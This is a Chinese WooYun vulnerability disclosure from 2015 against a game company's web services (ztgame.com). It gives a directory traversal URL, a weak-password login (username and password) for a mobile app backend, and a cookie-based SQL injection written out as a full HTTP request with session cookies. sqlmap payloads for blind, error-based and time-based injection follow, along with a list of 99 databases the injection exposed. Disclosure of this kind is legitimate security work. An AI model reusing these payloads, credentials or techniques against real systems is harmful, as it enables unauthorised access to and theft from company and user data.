乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-16: 细节向公众公开
漏洞打包,求良心20rank啊
0x01:文件目录遍历漏洞地址:http://event.ztgame.com
0x02.弱口令统一数据安卓app:http://mobile.ztgame.com/mobile/index.php账户:wangwei 密码:123456
0x03:sql注入漏洞,涉及99个库漏洞地址:
GET /mobileapp/zhibiao.php HTTP/1.1Host: mobile.ztgame.comConnection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI NOTE LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Referer: https://mobile.ztgame.com/mobileapp/index.phpAccept-Encoding: gzip,deflateAccept-Language: zh-CN,en-US;q=0.8Cookie: m_username=wangwei*; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3X-Requested-With: com.ztgame.openurl
Cookie中m_username参数存在注入
---Parameter: Cookie #1* ((custom) HEADER) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m_username=wangwei' AND 4789=4789 AND 'fWPU'='fWPU; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: m_username=wangwei' AND (SELECT 9825 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(9825=9825,1))),0x71706b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JNwZ'='JNwZ; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: m_username=wangwei' AND (SELECT * FROM (SELECT(SLEEP(5)))yQuv) AND'Hocl'='Hocl; m_hash=50e8eb7ea8fafc482d2a6ab68fc5ce28; PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3---[21:44:34] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.11, PHP 5.4.4back-end DBMS: MySQL 5.0
涉及99个数据库:
available databases [99]:[*] a_consume_day[*] a_ly360_consume_day[*] a_ptaidata_web[*] a_zoneinfo_hour[*] action_rpt_god[*] action_rpt_hs[*] action_rpt_pla[*] action_rpt_xxsj[*] action_rpt_ztgame[*] action_rpt_ztnew[*] all_zoneInfo[*] all_zoneInfo_hour[*] anti_fraud_cheat_account[*] anti_fraud_stat[*] area_stat_rpt[*] buy_silver[*] caiwu_check[*] caiwu_data_report[*] cb_rpt[*] check_ordervsobj[*] check_up[*] classify_user_rpt[*] consume_vip[*] cs_order[*] csjz_cb_tmp[*] csjz_hour_stat[*] data_node_course_detail[*] data_node_name_day[*] db_union_sortlist[*] dim_tpart_config[*] dim_zoneinfo_for_xinjian[*] easy_consume_rpt[*] finance_dw[*] finance_lost_reg[*] GAQ[*] GAQ1_download[*] GAQ4_download[*] GAQ5_download[*] GAQ6_download[*] GAQ8_download[*] GAQ9_download[*] hbs[*] hour_computer[*] hour_computer_back[*] hour_computer_bak11111[*] information_schema[*] jh_sortlist[*] loading_lost[*] mail_quick[*] media_stat[*] money_monitor[*] mysql[*] new_user_rpt[*] newzone_15index[*] objkeywords_stat[*] peng[*] ptai_stat_219[*] ptai_stat_report[*] ptai_stat_report_del[*] ptai_stat_rpt[*] realtime_rpt[*] realtime_rpt_test[*] realtime_rpt_tmp[*] remain_rpt[*] report[*] resource_manage_system[*] rpt_client_adcost[*] rpt_client_ptai_stat[*] rpt_mobile_conf[*] rpt_mobile_consume_stat[*] rpt_mobile_ptai_stat[*] rpt_mobile_realtime_stat[*] rpt_mobile_realtime_stat_test[*] rpt_mobile_user_trace[*] rpt_mobile_user_trace_test[*] rpt_must_ptai_stat[*] rpt_must_user_trace[*] scb_ws[*] scb_xxsj[*] select_db_detail[*] sobj_stat[*] sortlist_collect_rpt[*] stat[*] stat_analyze[*] stat_consume[*] test[*] transform_rpt[*] user_analyze[*] user_analyze_xt[*] user_analyze_zt2[*] user_analyze_ztgame[*] user_center_rpt[*] user_segmentation_report[*] vip[*] vip_xt_obj[*] vip_zt2_obj[*] vip_ztgame_obj[*] xxxx[*] zoneinfo
你们更专业
危害等级:高
漏洞Rank:20
确认时间:2015-12-02 14:35
感谢路人甲同学,再接再厉! 20rank奉上
暂无